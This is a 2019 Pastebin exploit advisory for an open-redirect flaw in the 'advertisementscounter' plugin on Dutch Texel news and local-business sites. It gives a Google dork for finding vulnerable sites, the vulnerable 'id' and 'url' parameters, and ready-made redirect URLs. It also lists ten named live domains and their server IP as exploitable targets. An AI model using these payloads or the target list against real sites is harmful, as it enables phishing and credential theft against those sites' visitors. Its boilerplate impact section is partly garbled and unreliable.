Advertisement
KingSkrupellos

HollandPlaza TexelseMedia AdvertisementsCounterOpen Redirect

Mar 28th, 2019
131
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.16 KB | None | 0 0
  1. ##################################################################################
  2.  
  3. # Exploit Title : HollandPlaza TexelseMedia AdvertisementsCounter Plugins Open Redirection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 28/03/2019
  7. # Vendor Homepage : texelsemedia.nl - texelplaza.nl
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : High
  11. # Google Dorks : inurl:/plugins/advertisementscounter/ site:nl
  12. # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  16. # Reference Link : cxsecurity.com/issue/WLB-2019030235
  17.  
  18. ##################################################################################
  19.  
  20. # Impact :
  21. ***********
  22. HollandPlaza TexelseMedia AdvertisementsCounter Plugins accepts a user-controlled input that specifies a
  23.  
  24. link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. An http parameter may
  25.  
  26. contain a URL value and could cause the web application to redirect the request to the specified URL.
  27.  
  28. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and
  29.  
  30. steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts
  31.  
  32. have a more trustworthy appearance. Open redirect is a failure in that process that makes it possible for attackers to
  33.  
  34. steer users to malicious websites. This vulnerability is used in phishing attacks to get users to visit malicious sites
  35.  
  36. without realizing it. Web users often encounter redirection when they visit the Web site of a company whose name
  37.  
  38. has been changed or which has been acquired by another company. Visiting unreal web page user's computer
  39.  
  40. becomes affected by malware the task of which is to deceive the valid actor and steal his personal data.
  41.  
  42. ##################################################################################
  43.  
  44. # Vulnerable File :
  45. *****************
  46. /advertisementscounter.php
  47.  
  48. # Vulnerable Parameters :
  49. ***********************
  50. ?id=
  51.  
  52. &url=
  53.  
  54. ?id=[ID-NUMBER]&url=
  55.  
  56. # Open Redirection Exploit :
  57. **************************
  58. /plugins/advertisementscounter/advertisementscounter.php?id=[ID-NUMBER]&url=https://www.[REDIRECTION-ADDRESS].gov
  59.  
  60. /plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://www.[REDIRECTION-ADDRESS].gov
  61.  
  62. ##################################################################################
  63.  
  64. # Example Vulnerable Sites :
  65. *************************
  66. [+] Vulnerable IP Address => 213.206.113.181 => There are 11 domains hosted on this server.
  67.  
  68. [+] kabelkranttexel.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
  69.  
  70. [+] texelplaza.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
  71.  
  72. [+] texel-plaza.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
  73.  
  74. [+] texelnieuws.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
  75.  
  76. [+] texeldezemaand.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
  77.  
  78. [+] texelditweekend.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
  79.  
  80. [+] familieberichtentexel.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
  81.  
  82. [+] werkoptexel.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
  83.  
  84. [+] recreerenoptexel.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
  85.  
  86. [+] recreatieoptexel.nl/plugins/advertisementscounter/advertisementscounter.php?id=14774&url=https://cxsecurity.com
  87.  
  88. ##################################################################################
  89.  
  90. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  91.  
  92. ##################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement